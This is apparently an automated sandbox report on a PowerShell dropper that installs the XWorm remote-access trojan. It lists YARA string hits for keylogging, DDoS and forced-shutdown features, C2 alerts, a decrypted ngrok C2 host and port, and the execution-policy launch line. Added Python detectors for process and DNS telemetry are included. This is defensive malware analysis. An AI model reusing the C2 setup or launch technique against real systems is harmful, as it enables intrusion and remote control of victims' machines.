
Windows Analysis Report
20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1

Overview

General Information

Sample name: 20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1
Analysis ID: 1602905
MD5: ac45d57d6196e0eb21f4136002fd645d
SHA1: d3d32e7473079db2dbbf959c887a16e87a22894c
SHA256: 52f1718467ed6617713e995fb1ad595f9040247df74acb489285a00212f7ff7d
Tags: 156-253-250-62, ps1, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Classification chart (image not reproduced): categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale clean / suspicious / malicious.

Process tree
  • System is w10x64
  • powershell.exe (PID: 7700 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tmpB20E.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\tmpB20E.exe" MD5: F5302ED0307CE30D226D50A45A0DCA9D)
  • cleanup
No configs have been found
Yara matches (dropped files)

Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe
Rule: rat_win_xworm_v3; Description: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
  • 0x58a9: $str01: $VB$Local_Port
  • 0x589a: $str02: $VB$Local_Host
  • 0x5ba0: $str03: get_Jpeg
  • 0x5552: $str04: get_ServicePack
  • 0x656e: $str05: Select * from AntivirusProduct
  • 0x676c: $str06: PCRestart
  • 0x6780: $str07: shutdown.exe /f /r /t 0
  • 0x6832: $str08: StopReport
  • 0x6808: $str09: StopDDos
  • 0x68fe: $str10: sendPlugin
  • 0x697e: $str11: OfflineKeylogger Not Enabled
  • 0x6ad6: $str12: -ExecutionPolicy Bypass -File "
  • 0x6bff: $str13: Content-length: 5235

Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe
Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0x6ca8: $cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6d45: $cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6e5a: $cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6b1a: $cnc4: POST / HTTP/1.1
Yara matches (memory dumps)

Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp
Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0x6aa8: $cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6b45: $cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6c5a: $cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x691a: $cnc4: POST / HTTP/1.1

Source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp
Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0x737e8: $cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x73885: $cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7399a: $cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7365a: $cnc4: POST / HTTP/1.1

Source: Process Memory Space: powershell.exe PID: 7700
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

(2 further entries not shown in this extract)
Yara matches (unpacked PEs)

Source: 4.0.tmpB20E.exe.f10000.0.unpack
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Source: 4.0.tmpB20E.exe.f10000.0.unpack
Rule: rat_win_xworm_v3; Description: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
  • 0x58a9: $str01: $VB$Local_Port
  • 0x589a: $str02: $VB$Local_Host
  • 0x5ba0: $str03: get_Jpeg
  • 0x5552: $str04: get_ServicePack
  • 0x656e: $str05: Select * from AntivirusProduct
  • 0x676c: $str06: PCRestart
  • 0x6780: $str07: shutdown.exe /f /r /t 0
  • 0x6832: $str08: StopReport
  • 0x6808: $str09: StopDDos
  • 0x68fe: $str10: sendPlugin
  • 0x697e: $str11: OfflineKeylogger Not Enabled
  • 0x6ad6: $str12: -ExecutionPolicy Bypass -File "
  • 0x6bff: $str13: Content-length: 5235

Source: 4.0.tmpB20E.exe.f10000.0.unpack
Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0x6ca8: $cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6d45: $cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6e5a: $cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6b1a: $cnc4: POST / HTTP/1.1

Source: 1.2.powershell.exe.1e40029eb40.0.unpack
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Source: 1.2.powershell.exe.1e40029eb40.0.unpack
Rule: rat_win_xworm_v3; Description: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
  • 0x3aa9: $str01: $VB$Local_Port
  • 0x3a9a: $str02: $VB$Local_Host
  • 0x3da0: $str03: get_Jpeg
  • 0x3752: $str04: get_ServicePack
  • 0x476e: $str05: Select * from AntivirusProduct
  • 0x496c: $str06: PCRestart
  • 0x4980: $str07: shutdown.exe /f /r /t 0
  • 0x4a32: $str08: StopReport
  • 0x4a08: $str09: StopDDos
  • 0x4afe: $str10: sendPlugin
  • 0x4b7e: $str11: OfflineKeylogger Not Enabled
  • 0x4cd6: $str12: -ExecutionPolicy Bypass -File "
  • 0x4dff: $str13: Content-length: 5235

(5 further entries not shown in this extract)

              System Summary

Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", ProcessId: 7700, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", ProcessId: 7700, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-30T10:36:48.589330+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 57655 | 3.127.138.57 | 10901 | TCP
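The two Sigma hits above and the process tree earlier in the report reduce to two checks over process-creation telemetry: a powershell.exe started with -ExecutionPolicy Unrestricted (or Bypass), and that same powershell.exe spawning tmpB20E.exe out of %LOCALAPPDATA%\Temp. The following is an added example, not Joe Sandbox or Sigma code: it applies those checks to constructed Sysmon-style events whose PIDs and command lines are copied from this report; the explorer.exe image assumed for parent PID 4056 (the report leaves ParentImage empty) and the RemoteSigned control case (PID 8100) are assumptions.

```python
"""Process-creation checks for the PowerShell dropper chain in this report.

Added example (not Joe Sandbox or Sigma code). Reproduces, on constructed
Sysmon Event ID 1 style events, the logic behind the "Change PowerShell
Policies to an Insecure Level" Sigma hit and the "Powershell drops PE file" /
process-spawn signatures: a powershell.exe started with -ExecutionPolicy
Unrestricted or Bypass, and a powershell.exe spawning an .exe from
%LOCALAPPDATA%\\Temp.
"""
import re

INSECURE_POLICIES = {"unrestricted", "bypass"}
TEMP_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.IGNORECASE)
TOKEN_RE = re.compile(r'"[^"]*"|\S+')   # split a Windows command line, keeping quoted paths whole


def execution_policy(cmdline):
    """Return the lower-cased -ExecutionPolicy value from a command line, or None.

    powershell.exe accepts the full switch, the documented alias -ep, and any
    unambiguous prefix such as -ex or -exec; all are matched so that a plain
    substring search for "ExecutionPolicy" cannot be sidestepped by abbreviation.
    """
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith("-"):
            continue
        name = tok[1:].lower()
        is_switch = name == "ep" or (len(name) >= 2 and name.startswith("ex")
                                     and "executionpolicy".startswith(name))
        if is_switch:
            return tokens[i + 1].lower()
    return None


def is_powershell(image):
    return image.rsplit("\\", 1)[-1].lower() in {"powershell.exe", "pwsh.exe"}


def triage(events):
    """Apply both checks to a list of process-creation events.

    Each event carries ProcessId, ParentProcessId, Image and CommandLine
    (Sysmon Event ID 1 field names). Returns one finding dict per hit.
    """
    findings = []
    by_pid = {e["ProcessId"]: e for e in events}
    for e in events:
        if is_powershell(e["Image"]):
            policy = execution_policy(e["CommandLine"])
            if policy in INSECURE_POLICIES:
                findings.append({"rule": "insecure_execution_policy",
                                 "pid": e["ProcessId"], "policy": policy})
        parent = by_pid.get(e["ParentProcessId"])
        if parent and is_powershell(parent["Image"]) and TEMP_EXE_RE.search(e["Image"]):
            findings.append({"rule": "powershell_spawned_temp_exe",
                             "pid": e["ProcessId"], "parent_pid": parent["ProcessId"],
                             "image": e["Image"]})
    return findings


# Constructed events modelled on the process tree in this report: PIDs 7700,
# 7708 and 7928 and their command lines are taken from it. The explorer.exe
# image for parent PID 4056 (the report leaves ParentImage empty) and the
# RemoteSigned launch (PID 8100) are assumptions added as a benign control.
SAMPLE_EVENTS = [
    {"ProcessId": 4056, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 7700, "ParentProcessId": 4056,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo '
                    r'-ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1"'},
    {"ProcessId": 7708, "ParentProcessId": 7700, "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 7928, "ParentProcessId": 7700,
     "Image": r"C:\Users\user\AppData\Local\Temp\tmpB20E.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\tmpB20E.exe"'},
    {"ProcessId": 8100, "ParentProcessId": 4056,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The execution policy is a convenience setting rather than a security boundary: the same script could have run under the default policy via -EncodedCommand or piped into the host, so treat the policy hit as a triage signal for what the process did next (the PE write into %TEMP% and the spawn) rather than as the control that failed. The abbreviation handling matters for the same reason: a rule keyed on the literal string "ExecutionPolicy" misses "-ep bypass".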


              AV Detection

Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Virustotal: Detection: 71%
Source: 20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1; ReversingLabs: Detection: 21%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Joe Sandbox ML: detected
Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp; String decryptor: 2.tcp.eu.ngrok.io
Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp; String decryptor: 10901
Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp; String decryptor: <123456789>
Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp; String decryptor: <Xwormmm>
Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp; String decryptor: XWorm V5.6
Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp; String decryptor: USB.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData

              Networking

Source: Network traffic; Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:57652 -> 3.127.138.57:10901
Source: Network traffic; Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:57655 -> 3.127.138.57:10901
Source: Yara match; File source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.7:49725 -> 3.126.37.18:10901
Source: global traffic; TCP traffic: 192.168.2.7:57576 -> 3.127.138.57:10901
Source: global traffic; TCP traffic: 192.168.2.7:57656 -> 18.157.68.73:10901
Source: global traffic; TCP traffic: 192.168.2.7:57667 -> 18.197.239.5:10901
Source: global traffic; TCP traffic: 192.168.2.7:57679 -> 18.192.93.86:10901
Source: global traffic; TCP traffic: 192.168.2.7:57556 -> 162.159.36.2:53
Source: Joe Sandbox View; IP Address: 3.126.37.18
Source: Joe Sandbox View; IP Address: 3.127.138.57
Source: Joe Sandbox View; IP Address: 18.192.93.86
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: unknown; TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 entries)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 entries)
Source: global traffic; DNS traffic detected: DNS query: 2.tcp.eu.ngrok.io
Source: global traffic; DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: powershell.exe, 00000001.00000002.1368287437.000001E4101E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1368287437.000001E410081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1351823605.000001E400001000.00000004.00000800.00020000.00000000.sdmp, tmpB20E.exe, 00000004.00000002.3784517191.0000000003191000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1351823605.000001E400001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1368287437.000001E4101E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1368287437.000001E410081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
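Three things in the Networking section are worth reproducing as logic rather than reading as a list: the "traffic detected without corresponding DNS query" heuristic, the lookup of the ngrok TCP tunnel hostname that the string decryptor also recovered (2.tcp.eu.ngrok.io, port 10901), and the fact that one hostname led to sessions with five different Amazon addresses on the same port within a single run. The following is an added example, not Joe Sandbox code. Its records are constructed Zeek-style dicts built from the flows above; the DNS answers are an assumption, because the report shows the query but not the responses, and the resolver allow-list and tunnel-domain suffixes are assumptions to adapt to your environment.

```python
"""Correlate connection records with DNS answers.

Added example, not Joe Sandbox code. Implements the reasoning behind three
observations in the Networking section: the "TCP/UDP traffic detected
without corresponding DNS query" heuristic, the lookup of an ngrok TCP
tunnel hostname, and repeated sessions to port 10901 on rotating AWS
addresses. Records are constructed Zeek-style dicts built from the flows
listed in the report; the DNS answers are an assumption, since the report
shows the query for 2.tcp.eu.ngrok.io but not its responses.
"""

IOC_PORTS = {10901}                                   # port from the report's decrypted config and flows
TUNNEL_SUFFIXES = (".ngrok.io", ".ngrok-free.app")    # assumption: extend with the tunnel providers you track
RESOLVERS = {"1.1.1.1", "162.159.36.2"}               # assumption: the analysis host's configured DNS resolvers


def correlate(records):
    """Walk records in time order and return {'endpoints': ..., 'findings': ...}.

    endpoints maps each queried name to the sorted addresses it resolved to,
    which is what shows that blocking one IP of a rotating tunnel is useless.
    findings is a list of (rule, detail) tuples in detection order.
    """
    resolved = {}      # ip -> name, from answers seen so far
    endpoints = {}     # name -> set of ips
    findings = []
    for r in sorted(records, key=lambda x: x["ts"]):
        if r["kind"] == "dns":
            name = r["query"].lower().rstrip(".")
            for ip in r.get("answers", []):
                resolved[ip] = name
                endpoints.setdefault(name, set()).add(ip)
            if name.endswith(TUNNEL_SUFFIXES):
                findings.append(("tunnel_domain_lookup", name))
            continue
        dst, dport = r["dst"], r["dport"]
        if dport == 53 and dst in RESOLVERS:
            continue   # the host talking to its own resolver is expected, not a C2 indicator
        name = resolved.get(dst)
        if dport in IOC_PORTS:
            findings.append(("ioc_port", f"{dst}:{dport} ({name or 'no DNS seen'})"))
        if name is None:
            findings.append(("conn_without_dns", f"{dst}:{dport}/{r['proto']}"))
    return {"endpoints": {n: sorted(ips) for n, ips in endpoints.items()},
            "findings": findings}


# Constructed records following the report's flows (ports, addresses and the
# ngrok hostname are from the report; timestamps, DNS answers and the
# example.com control case are constructed).
SAMPLE_RECORDS = [
    {"ts": 1, "kind": "conn", "proto": "tcp", "src": "192.168.2.7", "sport": 57556, "dst": "162.159.36.2", "dport": 53},
    {"ts": 2, "kind": "dns", "query": "2.tcp.eu.ngrok.io", "answers": ["3.127.138.57"]},
    {"ts": 3, "kind": "conn", "proto": "tcp", "src": "192.168.2.7", "sport": 57576, "dst": "3.127.138.57", "dport": 10901},
    {"ts": 4, "kind": "dns", "query": "2.tcp.eu.ngrok.io", "answers": ["3.126.37.18", "18.192.93.86"]},
    {"ts": 5, "kind": "conn", "proto": "tcp", "src": "192.168.2.7", "sport": 49725, "dst": "3.126.37.18", "dport": 10901},
    {"ts": 6, "kind": "conn", "proto": "tcp", "src": "192.168.2.7", "sport": 57656, "dst": "18.157.68.73", "dport": 10901},
    {"ts": 7, "kind": "conn", "proto": "udp", "src": "192.168.2.7", "sport": 60001, "dst": "1.1.1.1", "dport": 53},
    {"ts": 8, "kind": "dns", "query": "www.example.com", "answers": ["93.184.216.34"]},
    {"ts": 9, "kind": "conn", "proto": "tcp", "src": "192.168.2.7", "sport": 60002, "dst": "93.184.216.34", "dport": 443},
]

if __name__ == "__main__":
    result = correlate(SAMPLE_RECORDS)
    for name, ips in result["endpoints"].items():
        print(name, "->", ", ".join(ips))
    for rule, detail in result["findings"]:
        print(f"{rule:22} {detail}")
```

The conn_without_dns hit on 18.157.68.73 is a tunnel endpoint reached without a lookup the sensor saw; the report's own "UDP traffic detected without corresponding DNS query: 1.1.1.1" lines are the false-positive side of the same heuristic (the resolver traffic itself), which is why the resolver allow-list exists. A warm DNS cache or DNS over HTTPS on the host produces the same gap, so this rule ranks rather than convicts. For blocking, the durable indicators are the tunnel hostname and the port pattern, not the individual addresses: the report shows five of them (ASN AMAZON-02) behind one name in one run.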

              System Summary

Source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
Source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT; Author: ditekSHen
Source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPE; Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
Source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT; Author: ditekSHen
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPE; Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT; Author: ditekSHen
Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT; Author: ditekSHen
Source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT; Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPED; Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPED; Matched rule: Detects AsyncRAT; Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\tmpB20E.exe
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Code function: 4_2_00007FFAAC5B6B22
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Code function: 4_2_00007FFAAC5B5D76
Source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
